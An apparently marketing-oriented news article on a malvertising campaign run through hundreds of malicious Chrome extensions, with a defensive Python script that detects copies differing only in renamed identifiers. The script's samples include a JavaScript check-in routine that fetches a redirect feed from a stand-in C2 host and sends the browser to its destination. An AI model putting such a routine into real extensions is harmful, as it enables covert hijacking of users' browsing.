Malicious Google Chrome extensions used for malvertising were active for at least eight months. The extensions redirected millions of users to malicious sites, including affiliate links and a GDPR announcement site, in an apparent attempt to misdirect investigations and appear legitimate.
Malicious ads. Security researcher Jamila Kaya and Cisco’s Duo Security team identified the group of extensions. When a user installs any one of the 500+ extensions, a network of downstream malware sites acts in concert as command-and-control infrastructure, redirecting the browser through what look like ordinary, if intrusive, ads.
“The user’s host regularly checks in at an asynchronous interval to the other domains to receive new instructions, locations to upload data, and new domain and feed lists for advertisements and future redirects.”
Jamila Kaya and Jacob Rickerd (Duo.com)
Google response. The researchers alerted Google to the problem, and together they reached a high level of confidence that all of the rogue extensions had been disabled for current installs. Chrome users who have any of these extensions installed will see them marked locally as malware, prompting them to uninstall.
Presumably, the downstream domains have been added to a shared list of security hazard websites and removed from Google’s search index.
What Kaya discovered was that the various extensions all carelessly shared much the same source code, with only function names switched out. That was enough to make them appear different to Google’s automated duplicate-detection system, which allowed the operators to publish this volume of extensions to the Web Store.
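Duplicate detection that keys on the raw source is defeated by exactly this kind of renaming. As an added example (not code from the researchers or from Google), the script below fingerprints extension JavaScript after replacing every user-chosen identifier with a placeholder numbered by first appearance, so two copies that differ only in function and variable names hash identically; the JavaScript samples and the c2.example URL are constructed for illustration.

```python
"""Fingerprint extension source with identifiers abstracted away, so that
copies differing only in function/variable names hash identically."""
import hashlib
import re

# Keywords and well-known globals stay verbatim; any other identifier is
# replaced by a placeholder numbered by order of first appearance.
_KEEP = {"function", "return", "var", "let", "const", "if", "else", "for",
         "while", "new", "true", "false", "null", "this", "typeof",
         "chrome", "window", "document", "fetch", "setTimeout", "JSON"}
_IDENT = re.compile(r"[A-Za-z_$][\w$]*")
_TOKEN = re.compile(
    r"//[^\n]*|/\*.*?\*/"          # comments (dropped)
    r'|"(?:\\.|[^"\\])*"'          # double-quoted string literal
    r"|'(?:\\.|[^'\\])*'"          # single-quoted string literal
    r"|[A-Za-z_$][\w$]*"           # identifier or keyword
    r"|\d+(?:\.\d+)?"              # numeric literal
    r"|\s+"                        # whitespace (dropped)
    r"|.",                         # any other single character
    re.DOTALL)

def normalize(src: str) -> str:
    """Canonical token stream: comments/whitespace removed, names renamed."""
    names, out = {}, []
    for tok in (m.group(0) for m in _TOKEN.finditer(src)):
        if tok.isspace() or tok.startswith(("//", "/*")):
            continue
        if _IDENT.fullmatch(tok) and tok not in _KEEP:
            tok = names.setdefault(tok, f"ID{len(names)}")
        out.append(tok)
    return " ".join(out)

def fingerprint(src: str) -> str:
    return hashlib.sha256(normalize(src).encode()).hexdigest()

def same_logic(a: str, b: str) -> bool:
    return fingerprint(a) == fingerprint(b)

# Constructed samples: A and B are the same check-in routine with renamed
# identifiers; C is unrelated code.
SAMPLE_A = """function pullConfig(u) { // check in for a fresh redirect feed
  return fetch(u).then(r => r.json()).then(cfg => { window.location = cfg.dest; });
}
setTimeout(function () { pullConfig('https://c2.example/feed'); }, 600000);"""
SAMPLE_B = """function refreshRules(ep) {
  return fetch(ep).then(resp => resp.json()).then(c => { window.location = c.dest; });
}
setTimeout(function () { refreshRules('https://c2.example/feed'); }, 600000);"""
SAMPLE_C = "function add(a, b) { return a + b; }"
```

Running `same_logic(SAMPLE_A, SAMPLE_B)` returns True while `same_logic(SAMPLE_A, SAMPLE_C)` returns False; a store-side scanner could cluster submissions on this fingerprint rather than on the literal file hash.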
Why we care. As marketers, we need to know that security requirements governing the storage of data will continue to tighten, as Google’s new requirements outline. We should also be concerned that our reputation suffers when breaches occur and bad advertising gives millions of users a bad experience.